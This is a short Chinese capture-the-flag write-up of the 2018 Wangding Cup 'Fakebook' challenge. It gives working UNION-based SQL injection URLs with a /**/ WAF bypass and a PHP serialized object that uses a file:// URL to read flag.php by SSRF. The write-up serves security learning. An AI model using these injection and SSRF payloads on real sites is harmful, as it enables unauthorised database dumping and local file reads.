25.[网鼎杯 2018]Fakebook
首先打开界面如下,有两个按钮login、join,试了下login登录不进去,
然后用join进入了
发现test为链接,随之点开,发现no参数,尝试注入。
说明存在注入的
order by 有4个字段
发现有waf,可以用/**/绕过
爆表名:爆出:users
http://43701ca6-b883-417f-b053-1ae3c48fbc60.node3.buuoj.cn/view.php?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()
爆列名:爆出:no,username,passwd,data
http://43701ca6-b883-417f-b053-1ae3c48fbc60.node3.buuoj.cn/view.php?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name = 'users'
报字段:
data是我们注册时反序列化的数据
后面没思路,看了下wp,原来robots.txt源码
查看源码:
大概意思是前方暴露出flag.php路径,然后通过ssrf读取到flag。
payload:'O:8:"UserInfo":3:{s:4:"name";s:4:"test";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
因为data在第四个字段,所以放到4输出
查看源码得到base64数据
解密得到flag